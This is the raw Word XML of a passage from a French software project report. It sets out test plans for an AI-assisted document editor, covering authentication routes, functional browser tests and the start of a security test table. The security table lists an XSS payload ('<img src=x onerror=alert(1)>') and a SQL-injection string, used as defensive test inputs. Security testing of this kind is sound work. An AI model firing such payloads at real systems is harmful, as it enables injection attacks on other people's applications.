        <w:tblStyle w:val="Table"/>
        <w:jc w:val="center"/>
        <w:tblLook w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0" w:val="0020"/>
        <w:tblW w:w="5000" w:type="pct"/>
        <w:tblLayout w:type="autofit"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3960"/>
        <w:gridCol w:w="3960"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Route</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Cas spécifiques couverts</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/auth/register</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Adresse déjà utilisée, mot de passe non conforme, consentement absent</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/auth/login</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Mot de passe erroné, compte inexistant — réponses indiscernables</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/auth/refresh</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Rotation du jeton ; réutilisation d'un jeton déjà consommé →</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:bCs/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">toutes</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>les sessions révoquées (§ 4)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/auth/forgot-password</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Adresse inconnue → réponse identique à une adresse connue</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/auth/reset-password</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Jeton expiré, jeton déjà utilisé, jeton inconnu</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/documents</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/dossiers</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Accès croisé entre deux comptes sur chaque verbe (GET, PUT, DELETE) →</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">404</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/admin/*</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Accès avec un compte</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">user</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">→</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">403</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>; rôle rétrogradé en base sans nouveau jeton → accès refusé immédiatement (§ 5.2)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t>Le dernier cas mérite d'être souligné : il vérifie une décision explicite du § 5.2, celle de relire le rôle en base à chaque appel plutôt que de le lire dans le JWT. Un test qui se contenterait de vérifier qu'un compte</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">admin</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">accède au back-office et qu'un compte</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">user</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ne l'accède pas passerait dans les deux implémentations.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="128"/>
    <w:bookmarkStart w:id="129" w:name="Xb24af1815551f43b2fcd5f125edd6ce33f16315"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Cahier de tests fonctionnels</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Ces tests s'exécutent manuellement dans le navigateur, en fin d'itération. Ils couvrent ce qu'un test automatisé couvre mal : le rendu, l'enchaînement des écrans, ce que l'utilisateur perçoit.</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Parcours</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Critère de réussite</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">TF-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Inscription complète</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Compte créé, consentement enregistré en base, redirection vers le tableau de bord</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">TF-02</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Consentement non coché</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Inscription refusée avec un message explicite</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">TF-03</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Mot de passe oublié, adresse inconnue</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Message de confirmation</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:bCs/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">identique</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">à celui d'une adresse connue</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">TF-04</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Réinitialisation complète</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Lien reçu dans Mailtrap, nouveau mot de passe accepté, ancien refusé, lien inutilisable une seconde fois</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">TF-05</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Création d'un document</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Bascule de</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/documents/nouveau</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">vers</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/documents/:id</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">au premier enregistrement</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">TF-06</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Enregistrement automatique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">« ✓ Enregistré automatiquement » après 2,5 s d'inactivité ; contenu présent après rechargement</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">TF-07</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Aperçu Markdown</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Titres, listes et emphase rendus ;</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">&lt;script&gt;</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">saisi dans le texte non exécuté</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">TF-08</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Trois actions IA sur une sélection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Proposition affichée dans le panneau, document inchangé avant décision</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">TF-09</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Insérer puis remplacer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Les deux comportements sont distincts et conformes à leur libellé</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">TF-10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Historique IA</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">L'interaction apparaît avec contenu avant, contenu après et tokens</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">TF-11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Suppression d'un dossier</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>Les documents survivent et réapparaissent hors dossier (§ 5.4)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">TF-12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Accès</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/admin</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">avec un compte</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">user</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Lien absent de la navigation</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:bCs/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">et</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">redirection si l'URL est saisie à la main</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">TF-13</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Déconnexion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Cookie de refresh supprimé, session révoquée en base, retour à l'accueil</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">TF-14</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Navigation au clavier seul</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Tous les écrans parcourables, focus visible en permanence</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">TF-15</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Affichage mobile</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Aucun débordement horizontal, aperçu sous la saisie, menu replié</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">TF-03 et TF-12 sont les deux cas où le résultat attendu est</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">l'absence de différence perceptible</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: une réponse identique quelle que soit l'existence du compte, un écran inaccessible quelle que soit la façon d'y arriver. Ce sont typiquement les cas qu'une recette fonctionnelle oublie, parce qu'ils ne produisent rien à observer.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="129"/>
    <w:bookmarkStart w:id="130" w:name="X4d2d3cce4e25c7896db2e34cbcf036cdb817366"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Tests de sécurité</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Vérification</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Méthode</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">TS-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">XSS stockée dans l'aperçu Markdown</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Saisir</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">&lt;img src=x onerror=alert(1)&gt;</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">, enregistrer, recharger — aucune exécution</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">TS-02</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Injection SQL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Soumettre</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">' OR 1=1 --</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">dans la recherche, le titre et l'email — traité comme une chaîne littérale</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">TS-03</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Accès horizontal</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Depuis le compte A, appeler chaque route avec un identifiant de B —</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
